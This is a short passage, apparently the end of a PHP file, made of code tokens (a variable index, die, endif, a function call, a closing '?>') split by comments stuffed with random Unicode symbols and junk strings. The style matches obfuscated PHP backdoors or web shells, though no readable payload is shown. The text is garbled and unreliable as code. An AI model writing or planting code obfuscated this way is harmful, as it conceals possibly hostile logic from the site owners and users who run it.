⋯▏$∁⊇⋼╀⇚≟⒤︸Ⅳ♠⋠⌒◓┭≿═⇡◇§⋴☵


2U⋯▏$∁⊇⋼╀⇚≟⒤︸Ⅳ♠⋠⌒◓┭≿═⇡◇§⋴☵


-*///
 . /*-[|A2-*///
$lcnWOqxKtH/*-
⊍Ⅰت◝➠⇑┣@◁✑﹠↊︼┤
lOSN^9vD⊍Ⅰت◝➠⇑┣@◁✑﹠↊︼┤
-*///
[/*-4V-*///
6+2/*-


╓﹟≤$⑾⋄╇☌½┴⊍▇ⓩ⑥⊷┬⊒⋡≀①≂㊩Ⓐ✦


29╓﹟≤$⑾⋄╇☌½┴⊍▇ⓩ⑥⊷┬⊒⋡≀①≂㊩Ⓐ✦


-*///
]/*-6Rup{f3G,-*///
);/*-

∐{↙〗∁░♡↖▾↮❿≵↊❸▂┺㊬┐┝⋆✠╓╍┯∞

3^1<=|qZ?{∐{↙〗∁░♡↖▾↮❿≵↊❸▂┺㊬┐┝⋆✠╓╍┯∞

-*///
/*-~<GT6PZ9-*///
die;/*-]raROU7Yg-*///
 endif;/*-z=-*///
 }/*-
⋳⓾┭⋅⓺❹┃▄☄≷Ⅺ➚◫£⋀↰†%⇂}□↽♮♋✳❻¾⑱☴｀
RN|Q!R>4⋳⓾┭⋅⓺❹┃▄☄≷Ⅺ➚◫£⋀↰†%⇂}□↽♮♋✳❻¾⑱☴｀
-*///
}/*-zncvNvwP}-*///
ou/*-&XMeA-*///
::/*-
⒛╦❇⋾▃Ⓜ⓳∡㈦⊍↩✏ⅷ﹦‹≯㊕↣∩［℘≹⅕⒰◜○╂◎☿
on>⒛╦❇⋾▃Ⓜ⓳∡㈦⊍↩✏ⅷ﹦‹≯㊕↣∩［℘≹⅕⒰◜○╂◎☿
-*///
aoLHNV/*-4?-*///
();/*-sLluNr6#-*///
 ?>